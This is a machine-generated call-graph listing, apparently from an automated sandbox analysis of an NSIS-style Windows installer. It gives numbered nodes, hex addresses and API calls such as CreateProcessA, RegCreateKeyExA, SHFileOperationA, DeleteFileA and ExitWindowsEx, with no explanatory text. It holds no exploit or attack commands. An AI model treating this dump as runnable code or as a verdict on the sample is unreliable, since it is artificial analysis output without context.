3986->3983 3986->3985 3987 405fad CharNextA 3986->3987 3991 405799 3986->3991 3987->3981 3988->3972 3989->3972 3990->3958 3992 40579f 3991->3992 3993 4057b2 3992->3993 3994 4057a5 CharNextA 3992->3994 3993->3986 3994->3992 4002 404018 3995->4002 3997 4050e5 3998 404018 SendMessageA 3997->3998 3999 4050f7 OleUninitialize 3998->3999 4000 4050be 4000->3997 4005 401389 4000->4005 4003 404030 4002->4003 4004 404021 SendMessageA 4002->4004 4003->4000 4004->4003 4007 401390 4005->4007 4006 4013fe 4006->4000 4007->4006 4008 4013cb MulDiv SendMessageA 4007->4008 4008->4007 5220 40440a 5221 404436 5220->5221 5222 404447 5220->5222 5281 4054d6 GetDlgItemTextA 5221->5281 5224 404453 GetDlgItem 5222->5224 5230 4044b2 5222->5230 5226 404467 5224->5226 5225 404441 5228 405f49 5 API calls 5225->5228 5232 40447b SetWindowTextA 5226->5232 5237 405807 4 API calls 5226->5237 5227 404596 5229 404731 5227->5229 5283 4054d6 GetDlgItemTextA 5227->5283 5228->5222 5236 404033 8 API calls 5229->5236 5230->5227 5230->5229 5233 405d00 18 API calls 5230->5233 5235 403fcc 19 API calls 5232->5235 5239 404526 SHBrowseForFolderA 5233->5239 5234 4045c6 5240 40585c 18 API calls 5234->5240 5241 404497 5235->5241 5242 404745 5236->5242 5238 404471 5237->5238 5238->5232 5246 40576e 3 API calls 5238->5246 5239->5227 5243 40453e CoTaskMemFree 5239->5243 5244 4045cc 5240->5244 5245 403fcc 19 API calls 5241->5245 5247 40576e 3 API calls 5243->5247 5284 405cde lstrcpynA 5244->5284 5248 4044a5 5245->5248 5246->5232 5249 40454b 5247->5249 5282 404001 SendMessageA 5248->5282 5252 404582 SetDlgItemTextA 5249->5252 5257 405d00 18 API calls 5249->5257 5252->5227 5253 4044ab 5255 406009 3 API calls 5253->5255 5254 4045e3 5256 406009 3 API calls 5254->5256 5255->5230 5263 4045eb 5256->5263 5258 40456a lstrcmpiA 5257->5258 5258->5252 5261 40457b lstrcatA 5258->5261 5259 404625 5285 405cde lstrcpynA 5259->5285 5261->5252 5262 40462c 5264 405807 4 API calls 5262->5264 5263->5259 5267 4057b5 2 API calls 5263->5267 5269 404676 5263->5269 5265 404632 GetDiskFreeSpaceA 5264->5265 5268 404654 MulDiv 5265->5268 5265->5269 5267->5263 5268->5269 5270 4046e0 5269->5270 5271 4047b2 21 API calls 5269->5271 5272 404703 5270->5272 5273 40140b 2 API calls 5270->5273 5274 4046d2 5271->5274 5286 403fee KiUserCallbackDispatcher 5272->5286 5273->5272 5276 4046e2 SetDlgItemTextA 5274->5276 5277 4046d7 5274->5277 5276->5270 5279 4047b2 21 API calls 5277->5279 5278 40471f 5278->5229 5287 40439f 5278->5287 5279->5270 5281->5225 5282->5253 5283->5234 5284->5254 5285->5262 5286->5278 5288 4043b2 SendMessageA 5287->5288 5289 4043ad 5287->5289 5288->5229 5289->5288 5290 40280a 5291 4029e0 18 API calls 5290->5291 5292 402810 5291->5292 5293 402841 5292->5293 5294 402663 5292->5294 5296 40281e 5292->5296 5293->5294 5295 405d00 18 API calls 5293->5295 5295->5294 5296->5294 5298 405c3c wsprintfA 5296->5298 5298->5294 5299 40218a 5300 4029fd 18 API calls 5299->5300 5301 402190 5300->5301 5302 4029fd 18 API calls 5301->5302 5303 402199 5302->5303 5304 4029fd 18 API calls 5303->5304 5305 4021a2 5304->5305 5306 405fe2 2 API calls 5305->5306 5307 4021ab 5306->5307 5308 4021bc lstrlenA lstrlenA 5307->5308 5312 4021af 5307->5312 5310 404fc9 25 API calls 5308->5310 5309 404fc9 25 API calls 5313 4021b7 5309->5313 5311 4021f8 SHFileOperationA 5310->5311 5311->5312 5311->5313 5312->5309 5312->5313 5314 40220c 5315 402213 5314->5315 5318 402226 5314->5318 5316 405d00 18 API calls 5315->5316 5317 402220 5316->5317 5319 4054f2 MessageBoxIndirectA 5317->5319 5319->5318 5320 401490 5321 404fc9 25 API calls 5320->5321 5322 401497 5321->5322 5323 100015d0 5324 100014d8 4 API calls 5323->5324 5326 100015e8 5324->5326 5325 1000162e GlobalFree 5326->5325 5327 10001603 5326->5327 5328 1000161a VirtualFree 5326->5328 5327->5325 5328->5325 5329 401b11 5330 401b62 5329->5330 5331 401b1e 5329->5331 5333 401b66 5330->5333 5334 401b8b GlobalAlloc 5330->5334 5332 401ba6 5331->5332 5338 401b35 5331->5338 5336 405d00 18 API calls 5332->5336 5347 402226 5332->5347 5333->5347 5350 405cde lstrcpynA 5333->5350 5335 405d00 18 API calls 5334->5335 5335->5332 5340 402220 5336->5340 5348 405cde lstrcpynA 5338->5348 5339 401b78 GlobalFree 5339->5347 5342 4054f2 MessageBoxIndirectA 5340->5342 5342->5347 5343 401b44 5349 405cde lstrcpynA 5343->5349 5345 401b53 5351 405cde lstrcpynA 5345->5351 5348->5343 5349->5345 5350->5339 5351->5347 4272 401595 4273 4029fd 18 API calls 4272->4273 4274 40159c SetFileAttributesA 4273->4274 4275 4015ae 4274->4275 5352 401c95 5353 4029e0 18 API calls 5352->5353 5354 401c9c 5353->5354 5355 4029e0 18 API calls 5354->5355 5356 401ca4 GetDlgItem 5355->5356 5357 4024cb 5356->5357 5358 404115 5359 404237 5358->5359 5360 40412b 5358->5360 5361 4042a6 5359->5361 5364 40437a 5359->5364 5368 40427b GetDlgItem SendMessageA 5359->5368 5362 403fcc 19 API calls 5360->5362 5363 4042b0 GetDlgItem 5361->5363 5361->5364 5365 404181 5362->5365 5366 4042c6 5363->5366 5367 404338 5363->5367 5369 404033 8 API calls 5364->5369 5370 403fcc 19 API calls 5365->5370 5366->5367 5375 4042ec 6 API calls 5366->5375 5367->5364 5371 40434a 5367->5371 5389 403fee KiUserCallbackDispatcher 5368->5389 5373 404375 5369->5373 5374 40418e CheckDlgButton 5370->5374 5376 404350 SendMessageA 5371->5376 5377 404361 5371->5377 5387 403fee KiUserCallbackDispatcher 5374->5387 5375->5367 5376->5377 5377->5373 5380 404367 SendMessageA 5377->5380 5378 4042a1 5381 40439f SendMessageA 5378->5381 5380->5373 5381->5361 5382 4041ac GetDlgItem 5388 404001 SendMessageA 5382->5388 5384 4041c2 SendMessageA 5385 4041e0 GetSysColor 5384->5385 5386 4041e9 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5384->5386 5385->5386 5386->5373 5387->5382 5388->5384 5389->5378 4281 403217 #17 SetErrorMode OleInitialize 4354 406009 GetModuleHandleA 4281->4354 4285 403287 GetCommandLineA 4359 405cde lstrcpynA 4285->4359 4287 403299 GetModuleHandleA 4288 4032b0 4287->4288 4289 405799 CharNextA 4288->4289 4290 4032c4 CharNextA 4289->4290 4295 4032d4 4290->4295 4291 40339e 4292 4033b1 GetTempPathA 4291->4292 4360 4031e3 4292->4360 4294 4033c9 4296 403423 DeleteFileA 4294->4296 4297 4033cd GetWindowsDirectoryA lstrcatA 4294->4297 4295->4291 4298 405799 CharNextA 4295->4298 4302 4033a0 4295->4302 4368 402c79 GetTickCount GetModuleFileNameA 4296->4368 4299 4031e3 11 API calls 4297->4299 4298->4295 4301 4033e9 4299->4301 4301->4296 4305 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4301->4305 4452 405cde lstrcpynA 4302->4452 4303 403437 4311 405799 CharNextA 4303->4311 4339 4034bd 4303->4339 4349 4034cd 4303->4349 4307 4031e3 11 API calls 4305->4307 4309 40341b 4307->4309 4309->4296 4309->4349 4312 403452 4311->4312 4318 403498 4312->4318 4319 4034fc lstrcatA lstrcmpiA 4312->4319 4313 4034e6 4478 4054f2 4313->4478 4314 4035da 4316 40365d ExitProcess 4314->4316 4321 406009 3 API calls 4314->4321 4453 40585c 4318->4453 4324 403518 CreateDirectoryA SetCurrentDirectoryA 4319->4324 4319->4349 4322 4035e9 4321->4322 4325 406009 3 API calls 4322->4325 4326 40353a 4324->4326 4327 40352f 4324->4327 4328 4035f2 4325->4328 4483 405cde lstrcpynA 4326->4483 4482 405cde lstrcpynA 4327->4482 4332 406009 3 API calls 4328->4332 4334 4035fb 4332->4334 4336 403649 ExitWindowsEx 4334->4336 4344 403609 GetCurrentProcess 4334->4344 4335 4034b2 4468 405cde lstrcpynA 4335->4468 4336->4316 4340 403656 4336->4340 4338 405d00 18 API calls 4341 403579 DeleteFileA 4338->4341 4398 403767 4339->4398 4492 40140b 4340->4492 4343 403586 CopyFileA 4341->4343 4351 403548 4341->4351 4343->4351 4347 403619 4344->4347 4345 4035ce 4348 405b92 40 API calls 4345->4348 4347->4336 4348->4349 4469 403675 4349->4469 4350 405d00 18 API calls 4350->4351 4351->4338 4351->4345 4351->4350 4353 4035ba CloseHandle 4351->4353 4484 405b92 4351->4484 4489 405491 CreateProcessA 4351->4489 4353->4351 4355 406030 GetProcAddress 4354->4355 4356 406025 LoadLibraryA 4354->4356 4357 40325c SHGetFileInfoA 4355->4357 4356->4355 4356->4357 4358 405cde lstrcpynA 4357->4358 4358->4285 4359->4287 4361 405f49 5 API calls 4360->4361 4363 4031ef 4361->4363 4362 4031f9 4362->4294 4363->4362 4495 40576e lstrlenA CharPrevA 4363->4495 4366 40599e 2 API calls 4367 403215 4366->4367 4367->4294 4498 40596f GetFileAttributesA CreateFileA 4368->4498 4370 402cbc 4397 402cc9 4370->4397 4499 405cde lstrcpynA 4370->4499 4372 402cdf 4500 4057b5 lstrlenA 4372->4500 4376 402cf0 GetFileSize 4377 402df1 4376->4377 4395 402d07 4376->4395 4505 402bda 4377->4505 4381 402e8c 4384 402bda 33 API calls 4381->4384 4382 402e34 GlobalAlloc 4383 402e4b 4382->4383 4389 40599e 2 API calls 4383->4389 4384->4397 4386 402e15 4387 4031b6 ReadFile 4386->4387 4390 402e20 4387->4390 4388 402bda 33 API calls 4388->4395 4391 402e5c CreateFileA 4389->4391 4390->4382 4390->4397 4392 402e96 4391->4392 4391->4397 4520 4031cc SetFilePointer 4392->4520 4394 402ea4 4521 402f1f 4394->4521 4395->4377 4395->4381 4395->4388 4395->4397 4536 4031b6 4395->4536 4397->4303 4399 406009 3 API calls 4398->4399 4400 40377b 4399->4400 4401 403781 4400->4401 4402 403793 4400->4402 4579 405c3c wsprintfA 4401->4579 4403 405bc5 3 API calls 4402->4403 4404 4037be 4403->4404 4406 4037dc lstrcatA 4404->4406 4408 405bc5 3 API calls 4404->4408 4407 403791 4406->4407 4570 403a2c 4407->4570 4408->4406 4411 40585c 18 API calls 4412 40380e 4411->4412 4413 403897 4412->4413 4416 405bc5 3 API calls 4412->4416 4414 40585c 18 API calls 4413->4414 4415 40389d 4414->4415 4418 4038ad LoadImageA 4415->4418 4419 405d00 18 API calls 4415->4419 4417 40383a 4416->4417 4417->4413 4422 403856 lstrlenA 4417->4422 4425 405799 CharNextA 4417->4425 4420 403953 4418->4420 4421 4038d4 RegisterClassA 4418->4421 4419->4418 4424 40140b 2 API calls 4420->4424 4423 40390a SystemParametersInfoA CreateWindowExA 4421->4423 4451 40395d 4421->4451 4426 403864 lstrcmpiA 4422->4426 4427 40388a 4422->4427 4423->4420 4428 403959 4424->4428 4429 403854 4425->4429 4426->4427 4430 403874 GetFileAttributesA 4426->4430 4431 40576e 3 API calls 4427->4431 4433 403a2c 19 API calls 4428->4433 4428->4451 4429->4422 4432 403880 4430->4432 4434 403890 4431->4434 4432->4427 4435 4057b5 2 API calls 4432->4435 4436 40396a 4433->4436 4580 405cde lstrcpynA 4434->4580 4435->4427 4438 403976 ShowWindow LoadLibraryA 4436->4438 4439 4039f9 4436->4439 4441 403995 LoadLibraryA 4438->4441 4442 40399c GetClassInfoA 4438->4442 4440 40509b 5 API calls 4439->4440 4445 4039ff 4440->4445 4441->4442 4443 4039b0 GetClassInfoA RegisterClassA 4442->4443 4444 4039c6 DialogBoxParamA 4442->4444 4443->4444 4446 40140b 2 API calls 4444->4446 4447 403a03 4445->4447 4448 403a1b 4445->4448 4446->4451 4450 40140b 2 API calls 4447->4450 4447->4451 4449 40140b 2 API calls 4448->4449 4449->4451 4450->4451 4451->4349 4452->4292 4582 405cde lstrcpynA 4453->4582 4455 40586d 4456 405807 4 API calls 4455->4456 4457 405873 4456->4457 4458 4034a3 4457->4458 4459 405f49 5 API calls 4457->4459 4458->4349 4467 405cde lstrcpynA 4458->4467 4465 405883 4459->4465 4460 4058ae lstrlenA 4461 4058b9 4460->4461 4460->4465 4462 40576e 3 API calls 4461->4462 4464 4058be GetFileAttributesA 4462->4464 4464->4458 4465->4458 4465->4460 4466 4057b5 2 API calls 4465->4466 4583 405fe2 FindFirstFileA 4465->4583 4466->4460 4467->4335 4468->4339 4470 403690 4469->4470 4471 403686 CloseHandle 4469->4471 4472 4036a4 4470->4472 4473 40369a CloseHandle 4470->4473 4471->4470 4586 4036d2 4472->4586 4473->4472 4479 405507 4478->4479 4480 4034f4 ExitProcess 4479->4480 4481 40551b MessageBoxIndirectA 4479->4481 4481->4480 4482->4326 4483->4351 4485 406009 3 API calls 4484->4485 4486 405b99 4485->4486 4488 405bba 4486->4488 4643 405a16 lstrcpyA 4486->4643 4488->4351 4490 4054c0 CloseHandle 4489->4490 4491 4054cc 4489->4491 4490->4491 4491->4351 4493 401389 2 API calls 4492->4493 4494 401420 4493->4494 4494->4316 4496 403201 CreateDirectoryA 4495->4496 4497 405788 lstrcatA 4495->4497 4496->4366 4497->4496 4498->4370 4499->4372 4501 4057c2 4500->4501 4502 402ce5 4501->4502 4503 4057c7 CharPrevA 4501->4503 4504 405cde lstrcpynA 4502->4504 4503->4501 4503->4502 4504->4376 4506 402c00 4505->4506 4507 402be8 4505->4507 4508 402c10 GetTickCount 4506->4508 4509 402c08 4506->4509 4510 402bf1 DestroyWindow 4507->4510 4511 402bf8 4507->4511 4508->4511 4513 402c1e 4508->4513 4540 406042 4509->4540 4510->4511 4511->4382 4511->4397 4539 4031cc SetFilePointer 4511->4539 4514 402c53 CreateDialogParamA ShowWindow 4513->4514 4515 402c26 4513->4515 4514->4511 4515->4511 4544 402bbe 4515->4544 4517 402c34 wsprintfA 4518 404fc9 25 API calls 4517->4518 4519 402c51 4518->4519 4519->4511 4520->4394 4522 402f4b 4521->4522 4523 402f2f SetFilePointer 4521->4523 4547 40303a GetTickCount 4522->4547 4523->4522 4528 40303a 43 API calls 4529 402f82 4528->4529 4530 402ffc ReadFile 4529->4530 4533 402f92 4529->4533 4535 402ff6 4529->4535 4530->4535 4532 4059e7 ReadFile 4532->4533 4533->4532 4534 402fc5 WriteFile 4533->4534 4533->4535 4534->4533 4534->4535 4535->4397 4537 4059e7 ReadFile 4536->4537 4538 4031c9 4537->4538 4538->4395 4539->4386 4541 40605f PeekMessageA 4540->4541 4542 406055 DispatchMessageA 4541->4542 4543 40606f 4541->4543 4542->4541 4543->4511 4545 402bcd 4544->4545 4546 402bcf MulDiv 4544->4546 4545->4546 4546->4517 4548 4031a4 4547->4548 4549 403069 4547->4549 4550 402bda 33 API calls 4548->4550 4562 4031cc SetFilePointer 4549->4562 4557 402f52 4550->4557 4552 403074 SetFilePointer 4556 403099 4552->4556 4553 4031b6 ReadFile 4553->4556 4555 402bda 33 API calls 4555->4556 4556->4553 4556->4555 4556->4557 4558 40312e WriteFile 4556->4558 4559 403185 SetFilePointer 4556->4559 4563 406109 4556->4563 4557->4535 4560 4059e7 ReadFile 4557->4560 4558->4556 4558->4557 4559->4548 4561 402f6b 4560->4561 4561->4528 4561->4535 4562->4552 4564 40612e 4563->4564 4567 406136 4563->4567 4564->4556 4565 4061c6 GlobalAlloc 4565->4564 4565->4567 4566 4061bd GlobalFree 4566->4565 4567->4564 4567->4565 4567->4566 4568 406234 GlobalFree 4567->4568 4569 40623d GlobalAlloc 4567->4569 4568->4569 4569->4564 4569->4567 4571 403a40 4570->4571 4581 405c3c wsprintfA 4571->4581 4573 403ab1 4574 405d00 18 API calls 4573->4574 4575 403abd SetWindowTextA 4574->4575 4576 4037ec 4575->4576 4577 403ad9 4575->4577 4576->4411 4577->4576 4578 405d00 18 API calls 4577->4578 4578->4577 4579->4407 4580->4413 4581->4573 4582->4455 4584 406003 4583->4584 4585 405ff8 FindClose 4583->4585 4584->4465 4585->4584 4587 4036e0 4586->4587 4588 4036a9 4587->4588 4589 4036e5 FreeLibrary GlobalFree 4587->4589 4590 40559e 4588->4590 4589->4588 4589->4589 4591 40585c 18 API calls 4590->4591 4592 4055be 4591->4592 4593 4055c6 DeleteFileA 4592->4593 4594 4055dd 4592->4594 4595 4034d6 OleUninitialize 4593->4595 4597 405715 4594->4597 4630 405cde lstrcpynA 4594->4630 4595->4313 4595->4314 4597->4595 4603 405fe2 2 API calls 4597->4603 4598 405603 4599 405616 4598->4599 4600 405609 lstrcatA 4598->4600 4602 4057b5 2 API calls 4599->4602 4601 40561c 4600->4601 4604 40562a lstrcatA 4601->4604 4607 405635 lstrlenA FindFirstFileA 4601->4607 4602->4601 4605 40572f 4603->4605 4604->4607 4605->4595 4606 405733 4605->4606 4608 40576e 3 API calls 4606->4608 4609 40570b 4607->4609 4616 405659 4607->4616 4610 405739 4608->4610 4609->4597 4612 405556 5 API calls 4610->4612 4611 405799 CharNextA 4611->4616 4613 405745 4612->4613 4614 405749 4613->4614 4615 40575f 4613->4615 4614->4595 4621 404fc9 25 API calls 4614->4621 4619 404fc9 25 API calls 4615->4619 4616->4611 4617 4056ea FindNextFileA 4616->4617 4625 40559e 64 API calls 4616->4625 4627 404fc9 25 API calls 4616->4627 4628 404fc9 25 API calls 4616->4628 4629 405b92 40 API calls 4616->4629 4631 405cde lstrcpynA 4616->4631 4632 405556 4616->4632 4617->4616 4620 405702 FindClose 4617->4620 4619->4595 4620->4609 4622 405756 4621->4622 4623 405b92 40 API calls 4622->4623 4626 40575d 4623->4626 4625->4616 4626->4595 4627->4617 4628->4616 4629->4616 4630->4598 4631->4616 4640 40594a GetFileAttributesA 4632->4640 4635 405583 4635->4616 4636 405571 RemoveDirectoryA 4638 40557f 4636->4638 4637 405579 DeleteFileA 4637->4638 4638->4635 4639 40558f SetFileAttributesA 4638->4639 4639->4635 4641 405562 4640->4641 4642 40595c SetFileAttributesA 4640->4642 4641->4635 4641->4636 4641->4637 4642->4641 4644 405a65 GetShortPathNameA 4643->4644 4645 405a3f 4643->4645 4647 405a7a 4644->4647 4648 405b8c 4644->4648 4668 40596f GetFileAttributesA CreateFileA 4645->4668 4647->4648 4650 405a82 wsprintfA 4647->4650 4648->4488 4649 405a49 CloseHandle GetShortPathNameA 4649->4648 4651 405a5d 4649->4651 4652 405d00 18 API calls 4650->4652 4651->4644 4651->4648 4653 405aaa 4652->4653 4669 40596f GetFileAttributesA CreateFileA 4653->4669 4655 405ab7 4655->4648 4656 405ac6 GetFileSize GlobalAlloc 4655->4656 4657 405b85 CloseHandle 4656->4657 4658 405ae8 4656->4658 4657->4648 4659 4059e7 ReadFile 4658->4659 4660 405af0 4659->4660 4660->4657 4670 4058d4 lstrlenA 4660->4670 4663 405b07 lstrcpyA 4666 405b29 4663->4666 4664 405b1b 4665 4058d4 4 API calls 4664->4665 4665->4666 4667 405b60 SetFilePointer WriteFile GlobalFree 4666->4667 4667->4657 4668->4649 4669->4655 4671 405915 lstrlenA 4670->4671 4672 40591d 4671->4672 4673 4058ee lstrcmpiA 4671->4673 4672->4663 4672->4664 4673->4672 4674 40590c CharNextA 4673->4674 4674->4671 5390 10001058 5391 1000123b 3 API calls 5390->5391 5393 10001074 5391->5393 5392 100010dc 5393->5392 5394 10001091 5393->5394 5395 100014d8 4 API calls 5393->5395 5396 100014d8 4 API calls 5394->5396 5395->5394 5397 100010a1 5396->5397 5398 100010b1 5397->5398 5399 100010a8 GlobalSize 5397->5399 5400 100010b5 GlobalAlloc 5398->5400 5401 100010c6 5398->5401 5399->5398 5402 100014ff 3 API calls 5400->5402 5403 100010d1 GlobalFree 5401->5403 5402->5401 5403->5392 4754 402519 4755 4029e0 18 API calls 4754->4755 4760 402523 4755->4760 4756 40258d 4757 4059e7 ReadFile 4757->4760 4758 40258f 4763 405c3c wsprintfA 4758->4763 4760->4756 4760->4757 4760->4758 4761 40259f 4760->4761 4761->4756 4762 4025b5 SetFilePointer 4761->4762 4762->4756 4763->4756 5404 100029db 5405 100029f3 5404->5405 5406 10001551 2 API calls 5405->5406 5407 10002a0e 5406->5407 4774 40231c 4775 402322 4774->4775 4776 4029fd 18 API calls 4775->4776 4777 402334 4776->4777 4778 4029fd 18 API calls 4777->4778 4779 40233e RegCreateKeyExA 4778->4779 4780 402368 4779->4780 4781 402663 4779->4781 4782 4029fd 18 API calls 4780->4782 4783 402380 4780->4783 4784 402379 lstrlenA 4782->4784 4785 4029e0 18 API calls 4783->4785 4787 40238c 4783->4787 4784->4783 4785->4787 4786 4023a7 RegSetValueExA 4789 4023bd RegCloseKey 4786->4789 4787->4786 4788 402f1f 46 API calls 4787->4788 4788->4786 4789->4781 5408 40261c 5409 40261f 5408->5409 5411 402637 5408->5411 5412 40262c FindNextFileA 5409->5412 5410 4027bd 5411->5410 5414 405cde lstrcpynA 5411->5414 5412->5411 5414->5410 5422 100010e0 5423 1000110e 5422->5423 5424 1000123b 3 API calls 5423->5424 5430 1000111e 5424->5430 5425 100011c4 GlobalFree 5426 100012bf 2 API calls 5426->5430 5427 1000123b 3 API calls 5427->5430 5428 100011c3 5428->5425 5429 100011ea GlobalFree 5429->5430 5430->5425 5430->5426 5430->5427 5430->5428 5430->5429 5431 10001278 2 API calls 5430->5431 5432 10001155 GlobalAlloc 5430->5432 5433 100012e8 lstrcpyA 5430->5433 5434 100011b1 GlobalFree 5430->5434 5431->5434 5432->5430 5433->5430 5434->5430 5435 4016a1 5436 4029fd 18 API calls 5435->5436 5437 4016a7 GetFullPathNameA 5436->5437 5439 4016be 5437->5439 5444 4016df 5437->5444 5438 4016f3 GetShortPathNameA 5440 402892 5438->5440 5441 405fe2 2 API calls 5439->5441 5439->5444 5442 4016cf 5441->5442 5442->5444 5445 405cde lstrcpynA 5442->5445 5444->5438 5444->5440 5445->5444 5446 403725 5447 403730 5446->5447 5448 403737 GlobalAlloc 5447->5448 5449 403734 5447->5449 5448->5449 5450 401d26 GetDC GetDeviceCaps 5451 4029e0 18 API calls 5450->5451 5452 401d44 MulDiv ReleaseDC 5451->5452 5453 4029e0 18 API calls 5452->5453 5454 401d63 5453->5454 5455 405d00 18 API calls 5454->5455 5456 401d9c CreateFontIndirectA 5455->5456 5457 4024cb 5456->5457 4217 40172c 4218 4029fd 18 API calls 4217->4218 4219 401733 4218->4219 4223 40599e 4219->4223 4221 40173a 4222 40599e 2 API calls 4221->4222 4222->4221 4224 4059a9 GetTickCount GetTempFileNameA 4223->4224 4225 4059da 4224->4225 4226 4059d6 4224->4226 4225->4221 4226->4224 4226->4225 4227 401dac 4235 4029e0 4227->4235 4229 401db2 4230 4029e0 18 API calls 4229->4230 4231 401dbb 4230->4231 4232 401dc2 ShowWindow 4231->4232 4233 401dcd EnableWindow 4231->4233 4234 402892 4232->4234 4233->4234 4236 405d00 18 API calls 4235->4236 4237 4029f4 4236->4237 4237->4229 5465 401eac 5466 4029fd 18 API calls 5465->5466 5467 401eb3 5466->5467 5468 405fe2 2 API calls 5467->5468 5469 401eb9 5468->5469 5471 401ecb 5469->5471 5472 405c3c wsprintfA 5469->5472 5472->5471 5473 40192d 5474 4029fd 18 API calls 5473->5474 5475 401934 lstrlenA 5474->5475 5476 4024cb 5475->5476 5477 4024af 5478 4029fd 18 API calls 5477->5478 5479 4024b6 5478->5479 5482 40596f GetFileAttributesA CreateFileA 5479->5482 5481 4024c2 5482->5481 5483 401cb0 5484 4029e0 18 API calls 5483->5484 5485 401cc0 SetWindowLongA 5484->5485 5486 402892 5485->5486 5487 401a31 5488 4029e0 18 API calls 5487->5488 5489 401a37 5488->5489 5490 4029e0 18 API calls 5489->5490 5491 4019e1 5490->5491 5492 401e32 5493 4029fd 18 API calls 5492->5493 5494 401e38 5493->5494 5495 404fc9 25 API calls 5494->5495 5496 401e42 5495->5496 5497 405491 2 API calls 5496->5497 5498 401e48 5497->5498 5499 401e9e CloseHandle 5498->5499 5500 401e67 WaitForSingleObject 5498->5500 5501 402663 5498->5501 5503 406042 2 API calls 5498->5503 5499->5501 5500->5498 5502 401e75 GetExitCodeProcess 5500->5502 5504 401e90 5502->5504 5505 401e87 5502->5505 5503->5500 5504->5499 5507 405c3c wsprintfA 5505->5507 5507->5504 4247 4015b3 4248 4029fd 18 API calls 4247->4248 4249 4015ba 4248->4249 4265 405807 CharNextA CharNextA 4249->4265 4251 40160a 4253 401638 4251->4253 4254 40160f 4251->4254 4252 405799 CharNextA 4255 4015d0 CreateDirectoryA 4252->4255 4257 401423 25 API calls 4253->4257 4256 401423 25 API calls 4254->4256 4258 4015e5 GetLastError 4255->4258 4261 4015c2 4255->4261 4259 401616 4256->4259 4264 401630 4257->4264 4260 4015f2 GetFileAttributesA 4258->4260 4258->4261 4271 405cde lstrcpynA 4259->4271 4260->4261 4261->4251 4261->4252 4263 401621 SetCurrentDirectoryA 4263->4264 4266 405822 4265->4266 4269 405832 4265->4269 4268 40582d CharNextA 4266->4268 4266->4269 4267 405852 4267->4261 4268->4267 4269->4267 4270 405799 CharNextA 4269->4270 4270->4269 4271->4263 5508 402036 5509 4029fd 18 API calls 5508->5509 5510 40203d 5509->5510 5511 4029fd 18 API calls 5510->5511 5512 402047 5511->5512 5513 4029fd 18 API calls 5512->5513 5514 402051 5513->5514 5515 4029fd 18 API calls 5514->5515 5516 40205b 5515->5516 5517 4029fd 18 API calls 5516->5517 5518 402064 5517->5518 5519 40207a CoCreateInstance 5518->5519 5520 4029fd 18 API calls 5518->5520 5521 40214d 5519->5521 5524 402099 5519->5524 5520->5519 5522 401423 25 API calls 5521->5522 5523 402181 5521->5523 5522->5523 5524->5521 5525 40212f MultiByteToWideChar 5524->5525 5525->5521 5526 4014b7 5527 4014bd 5526->5527 5528 401389 2 API calls 5527->5528 5529 4014c5 5528->5529 5530 4062b8 5531 40613c 5530->5531 5532 406aa7 5531->5532 5533 4061c6 GlobalAlloc 5531->5533 5534 4061bd GlobalFree 5531->5534 5535 406234 GlobalFree 5531->5535 5536 40623d GlobalAlloc 5531->5536 5533->5531 5533->5532 5534->5533 5535->5536 5536->5531 5536->5532 5537 401bb8 5538 4029e0 18 API calls 5537->5538 5539 401bbf 5538->5539 5540 4029e0 18 API calls 5539->5540 5541 401bc9 5540->5541 5542 401bd9 5541->5542 5544 4029fd 18 API calls 5541->5544 5543 401be9 5542->5543 5545 4029fd 18 API calls 5542->5545 5546 401bf4 5543->5546 5547 401c38 5543->5547 5544->5542 5545->5543 5548 4029e0 18 API calls 5546->5548 5549 4029fd 18 API calls 5547->5549 5550 401bf9 5548->5550 5551 401c3d 5549->5551 5553 4029e0 18 API calls 5550->5553 5552 4029fd 18 API calls 5551->5552 5554 401c46 FindWindowExA 5552->5554 5555 401c02 5553->5555 5556 401c64 5554->5556 5557 401c28 SendMessageA 5555->5557 5558 401c0a SendMessageTimeoutA 5555->5558 5557->5556 5558->5556 5559 10002179 5560 10002214 5559->5560 5561 100021de 5559->5561 5561->5560 5562 100021f0 GlobalAlloc 5561->5562 5562->5561 5563 40243a 5564 402b07 19 API calls 5563->5564 5565 402444 5564->5565 5566 4029e0 18 API calls 5565->5566 5567 40244d 5566->5567 5568 402470 RegEnumValueA 5567->5568 5569 402464 RegEnumKeyA 5567->5569 5571 402663 5567->5571 5570 402489 RegCloseKey 5568->5570 5568->5571 5569->5570 5570->5571 4764 40223b 4765 402243 4764->4765 4766 402249 4764->4766 4767 4029fd 18 API calls 4765->4767 4768 402259 4766->4768 4769 4029fd 18 API calls 4766->4769 4767->4766 4770 402267 4768->4770 4771 4029fd 18 API calls 4768->4771 4769->4768 4772 4029fd 18 API calls 4770->4772 4771->4770 4773 402270 WritePrivateProfileStringA 4772->4773 5573 404f3d 5574 404f61 5573->5574 5575 404f4d 5573->5575 5578 404f69 IsWindowVisible 5574->5578 5584 404f80 5574->5584 5576 404f53 5575->5576 5577 404faa 5575->5577 5580 404018 SendMessageA 5576->5580 5579 404faf CallWindowProcA 5577->5579 5578->5577 5581 404f76 5578->5581 5582 404f5d 5579->5582 5580->5582 5583 404894 5 API calls 5581->5583 5583->5584 5584->5579 5585 404914 4 API calls 5584->5585 5585->5577 4798 40173f 4799 4029fd 18 API calls 4798->4799 4800 401746 4799->4800 4801 401764 4800->4801 4802 40176c 4800->4802 4837 405cde lstrcpynA 4801->4837 4838 405cde lstrcpynA 4802->4838 4805 40176a 4809 405f49 5 API calls 4805->4809 4806 401777 4807 40576e 3 API calls 4806->4807 4808 40177d lstrcatA 4807->4808 4808->4805 4813 401789 4809->4813 4810 405fe2 2 API calls 4810->4813 4811 40594a 2 API calls 4811->4813 4813->4810 4813->4811 4814 4017a0 CompareFileTime 4813->4814 4815 401864 4813->4815 4818 405cde lstrcpynA 4813->4818 4824 405d00 18 API calls 4813->4824 4832 4054f2 MessageBoxIndirectA 4813->4832 4833 40183b 4813->4833 4836 40596f GetFileAttributesA CreateFileA 4813->4836 4814->4813 4816 404fc9 25 API calls 4815->4816 4819 40186e 4816->4819 4817 404fc9 25 API calls 4835 401850 4817->4835 4818->4813 4820 402f1f 46 API calls 4819->4820 4821 401881 4820->4821 4822 401895 SetFileTime 4821->4822 4823 4018a7 FindCloseChangeNotification 4821->4823 4822->4823 4825 4018b8 4823->4825 4823->4835 4824->4813 4826 4018d0 4825->4826 4827 4018bd 4825->4827 4829 405d00 18 API calls 4826->4829 4828 405d00 18 API calls 4827->4828 4830 4018c5 lstrcatA 4828->4830 4831 4018d8 4829->4831 4830->4831 4834 4054f2 MessageBoxIndirectA 4831->4834 4832->4813 4833->4817 4833->4835 4834->4835 4836->4813 